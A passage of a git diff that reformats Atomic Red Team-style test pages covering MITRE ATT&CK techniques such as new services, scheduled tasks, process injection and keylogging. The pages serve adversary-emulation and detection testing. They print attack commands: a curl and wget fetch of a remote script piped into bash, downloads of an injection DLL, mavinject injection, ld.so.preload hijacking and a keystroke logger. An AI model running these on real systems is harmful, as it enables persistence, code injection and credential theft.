## Atomic Test #2 - System Network Connections Discovery with PowerShell + Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-NetTCPConnection ``` - - - - -

## Atomic Test #3 - System Network Connections Discovery Linux & MacOS + Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh netstat who -a ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1050.md b/Atomic_Threat_Coverage/Triggers/T1050.md
index 5dad7169..8afc63b1 100644
--- a/Atomic_Threat_Coverage/Triggers/T1050.md
+++ b/Atomic_Threat_Coverage/Triggers/T1050.md
@@ -1,8 +1,15 @@
 # T1050 - New Service
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1050)
+
When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. -Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).
+Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with +services or by directly modifying the Registry. The service name may be disguised by using a name from a related +operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be +created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service +to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services +through [Service Execution](https://attack.mitre.org/techniques/T1035). ## Atomic Tests @@ -10,28 +17,25 @@ Adversaries may install a new service that can be configured to execute at start - [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell) -
## Atomic Test #1 - Service Installation CMD + Download an executable from github and start it as a service. -Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. +Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which +will create and start the service. Results will output via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc.exe create #{service_name} binPath= #{binary_path} @@ -39,50 +43,49 @@ sc.exe start #{service_name} ``` #### Cleanup Commands: + ```cmd sc.exe stop #{service_name} >nul 2>&1 sc.exe delete #{service_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Service binary must exist on disk at specified location (#{binary_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` - - -

## Atomic Test #2 - Service Installation PowerShell + Installs A Local Service via PowerShell. -Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. +Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then +use `New-Service` and `Start-Service` to start service. Results will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" @@ -90,27 +93,28 @@ Start-Service -Name "#{service_name}" ``` #### Cleanup Commands: + ```powershell Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Service binary must exist on disk at specified location (#{binary_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1053.md b/Atomic_Threat_Coverage/Triggers/T1053.md
index 40d528c1..af7af2ca 100644
--- a/Atomic_Threat_Coverage/Triggers/T1053.md
+++ b/Atomic_Threat_Coverage/Triggers/T1053.md
@@ -1,8 +1,12 @@
 # T1053 - Scheduled Task
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
+
Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security) -An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
+An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to +conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context +of a specified account. ## Atomic Tests @@ -14,10 +18,10 @@ An adversary may use task scheduling to execute programs at system startup or on - [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task) -
## Atomic Test #1 - At.exe Scheduled task + Executes cmd.exe Note: deprecated in Windows 8+ @@ -25,70 +29,53 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd at 13:20 /interactive cmd ``` - - - - -

## Atomic Test #2 - Scheduled task Local -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - -**Supported Platforms:** Windows - +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ``` #### Cleanup Commands: + ```cmd SCHTASKS /Delete /TN spawn /F >nul 2>&1 ``` - - - -

## Atomic Test #3 - Scheduled task Remote + Create a task on a remote system. -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| @@ -97,39 +84,30 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe | user_name | Username DOMAIN\User | String | DOMAIN\user| | password | Password | String | At0micStrong| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ``` #### Cleanup Commands: + ```cmd SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1 ``` - - - -

## Atomic Test #4 - Powershell Cmdlet Scheduled Task + Create an atomic scheduled task that leverages native powershell cmdlets. -Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. +Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $Action = New-ScheduledTaskAction -Execute "calc.exe" @@ -141,12 +119,9 @@ Register-ScheduledTask AtomicTask -InputObject $object ``` #### Cleanup Commands: + ```powershell Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1055.md b/Atomic_Threat_Coverage/Triggers/T1055.md
index 6f98eef1..8181dc62 100644
--- a/Atomic_Threat_Coverage/Triggers/T1055.md
+++ b/Atomic_Threat_Coverage/Triggers/T1055.md
@@ -1,27 +1,53 @@
 # T1055 - Process Injection
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
+
Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. ### Windows -There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017) - -* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread. -* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017) -* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended. -* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. 
(Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table) -* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017) +There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame +Process Injection July 2017) + +* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking + execution by creating a remote thread. +* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) + then invoking execution with either additional code or by creating a remote thread. The displacement of the injected + code introduces the additional requirement for functionality to remap memory references. Variations of this method + such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing + into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017) +* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended. +* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: + Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. 
A + variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious + code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via + an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another + variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: + Microsoft Atom Table) +* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to + redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov + 2017) ### Mac and Linux -Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle) +Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed +Needle) -* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997) -* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle) -* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle) -* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. 
(Citation: VDSO hijack 2009) +* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn + application programming interface (API) can be used to dynamically load a library (shared object) in a process which + can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997) +* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed + Needle) +* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. + This technique is very rare due to its complexity. (Citation: Uninformed Needle) +* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the + linux-vdso.so shared object. (Citation: VDSO hijack 2009) -Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
+Malware commonly utilizes process injection to access system resources through which Persistence and other environment +modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and +further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication +channel. ## Atomic Tests @@ -35,166 +61,139 @@ Malware commonly utilizes process injection to access system resources through w - [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path) -
## Atomic Test #1 - Process Injection via mavinject.exe + Windows 10 Utility To Inject DLLS. -Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. +Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to +perform process injection in T1055.dll. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll| | process_id | PID of input_arguments | Integer | (get-process spoolsv).id| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" ``` - - -

## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload -This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - -Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload. - -**Supported Platforms:** Linux +This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used +by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. +Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | ../bin/T1055.so| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash echo #{path_to_shared_library} > /etc/ld.so.preload ``` - - - - -

## Atomic Test #3 - Shared Library Injection via LD_PRELOAD -This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - -Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - -**Supported Platforms:** Linux +This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by +threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. +Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output +will be via stdout. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | /opt/AtomicRedTeam/atomics/T1055/bin/T1055.so| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash LD_PRELOAD=#{path_to_shared_library} ls ``` - - - - -

## Atomic Test #4 - Process Injection via C# + Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques + 1. Process injection 2. ApcInjectionAnyProcess 3. ApcInjectionNewProcess 4. IatInjection 5. ThreadHijack -Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_binary | Output Binary | Path | T1055.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd .\bin\#{exe_binary} ``` - - - - -

## Atomic Test #5 - svchost writing a file to a UNC path + svchost.exe writing a non-Microsoft Office file to a file with a UNC path. -Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. +Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with +output to a txt file. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy C:\Windows\System32\cmd.exe C:\svchost.exe @@ -202,13 +201,10 @@ C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt ``` #### Cleanup Commands: + ```cmd del C:\T1055.txt >nul 2>&1 del C:\svchost.exe >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1056.md b/Atomic_Threat_Coverage/Triggers/T1056.md
index 40ae4ee8..174225f6 100644
--- a/Atomic_Threat_Coverage/Triggers/T1056.md
+++ b/Atomic_Threat_Coverage/Triggers/T1056.md
@@ -1,40 +1,47 @@
 # T1056 - Input Capture + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056) +
Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception. -Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012) +Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: +Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC +prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012) -Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises. +Keylogging is likely to be used to acquire credentials for new access opportunities +when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an +adversary to remain passive on a system for a period of time before an opportunity arises. -Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. 
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)
+Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit +credentials of users who attempt to log into the service. This variation on input capture may be conducted +post-compromise using legitimate administrative access as a backup measure to maintain network access +through [External Remote Services](https://attack.mitre.org/techniques/T1133) +and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of +the externally facing web service. (Citation: Volexity Virtual Private Keylogging) ## Atomic Tests - [Atomic Test #1 - Input Capture](#atomic-test-1---input-capture) -
## Atomic Test #1 - Input Capture + Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) -Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. +Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | $env:TEMP\key.log| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-Location $PathToAtomicsFolder @@ -42,12 +49,9 @@ Set-Location $PathToAtomicsFolder ``` #### Cleanup Commands: + ```powershell Remove-Item $env:TEMP\key.log -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1057.md b/Atomic_Threat_Coverage/Triggers/T1057.md
index aa4788d2..90a99e8d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1057.md
+++ b/Atomic_Threat_Coverage/Triggers/T1057.md
@@ -1,10 +1,13 @@
 # T1057 - Process Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057) +
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility. +An example command that would obtain details on processes is "tasklist" using +the [Tasklist](https://attack.mitre.org/software/S0057) utility. ### Mac and Linux @@ -16,62 +19,44 @@ In Mac and Linux, this is accomplished with the ps command. ## Atomic Test #1 - Process Discovery - ps + Utilize ps to identify processes. -Upon successful execution, sh will execute ps and output to /tmp/loot.txt. +Upon successful execution, sh will execute ps and output to /tmp/loot.txt. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ps >> #{output_file} ps aux >> #{output_file} ``` - - - - -

## Atomic Test #2 - Process Discovery - tasklist + Utilize tasklist to identify processes. -Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. +Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd tasklist ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1058.md b/Atomic_Threat_Coverage/Triggers/T1058.md
index d55b31fc..4bc1c887 100644
--- a/Atomic_Threat_Coverage/Triggers/T1058.md
+++ b/Atomic_Threat_Coverage/Triggers/T1058.md
@@ -1,44 +1,43 @@
 # T1058 - Service Registry Permissions Weakness + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1058) +
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security) -If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). +If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then +adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the +service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain +persistence and/or privilege escalation to the account context the service is set to execute under (local/domain +account, SYSTEM, LocalService, or NetworkService). -Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)
+Adversaries may also alter Registry keys associated with service failure parameters (such as +FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally +corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)
## Atomic Tests - [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness) -
## Atomic Test #1 - Service Registry Permissions Weakness -Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + +Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service check | String | weakservicename| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1059.md b/Atomic_Threat_Coverage/Triggers/T1059.md
index bc8d615e..f40d371d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1059.md
+++ b/Atomic_Threat_Coverage/Triggers/T1059.md
@@ -1,38 +1,33 @@
 # T1059 - Command-Line Interface + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059) +
Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)). -Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
+Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an +operation. ## Atomic Tests - [Atomic Test #1 - Command-Line Interface](#atomic-test-1---command-line-interface) -
## Atomic Test #1 - Command-Line Interface -Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. - -Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. - -**Supported Platforms:** macOS, Linux - +Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control +the server. +Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker +file in `/tmp/art-fish.txt`. +**Supported Platforms:** macOS, Linux -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1060.md b/Atomic_Threat_Coverage/Triggers/T1060.md
index c13aa68f..c6870dcb 100644
--- a/Atomic_Threat_Coverage/Triggers/T1060.md
+++ b/Atomic_Threat_Coverage/Triggers/T1060.md
@@ -1,39 +1,59 @@
 # T1060 - Registry Run Keys / Startup Folder + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060) +
